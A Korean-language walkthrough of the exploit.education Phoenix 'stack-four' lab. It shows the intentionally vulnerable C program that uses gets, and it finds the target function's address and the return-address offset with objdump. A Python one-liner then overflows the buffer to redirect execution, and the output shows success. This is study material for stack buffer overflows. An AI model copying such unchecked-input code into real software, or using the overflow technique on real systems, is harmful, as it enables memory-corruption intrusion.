[Phoenix] Stack four

1. intro

2. code 및 분석

2.1.  C code

/*
 * phoenix/stack-four, by https://exploit.education
 *
 * The aim is to execute the function complete_level by modifying the
 * saved return address, and pointing it to the complete_level() function.
 *
 * Why were the apple and orange all alone? Because the bananna split.
 */

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

char *gets(char *);

void complete_level() {
  printf("Congratulations, you've finished " LEVELNAME " :-) Well done!\n");
  exit(0);
}

void start_level() {
  char buffer[64];
  void *ret;

  gets(buffer);

  ret = __builtin_return_address(0);
  printf("and will be returning to %p\n", ret);
}

int main(int argc, char **argv) {
  printf("%s\n", BANNER);
  start_level();
}

 

2.2. 분석

main 함수에서 start_level 함수를 call하고, buffer에 값을 받아들인 뒤 이를 출력하고 종료한다.

 

3. 취약점 확인 및 공격 준비

3.1. 취약점

gets. 크기 체크 안함. 그래서 start_level ret address 변조 가능.

 

3.2. 공격 준비

마찬가지로 complete_level의 주소 확인.

 

user@phoenix-amd64:/opt/phoenix/amd64$ objdump -d ./stack-four | grep complete_level
000000000040061d <complete_level>:

start_level의 buffer 변수로부터 ret address 위치 확인

...
   0x000000000040063d <+8>:     lea    -0x50(%rbp),%rax
   0x0000000000400641 <+12>:    mov    %rax,%rdi
   0x0000000000400644 <+15>:    callq  0x400470 <gets@plt>
...

 

4. exploit

user@phoenix-amd64:/opt/phoenix/amd64$ (python -c 'print "A"*0x58+"\x1d\x06\x40\x00\x00\x00\x00\x00"') | ./stack-four
Welcome to phoenix/stack-four, brought to you by https://exploit.education
and will be returning to 0x40061d
Congratulations, you've finished phoenix/stack-four :-) Well done!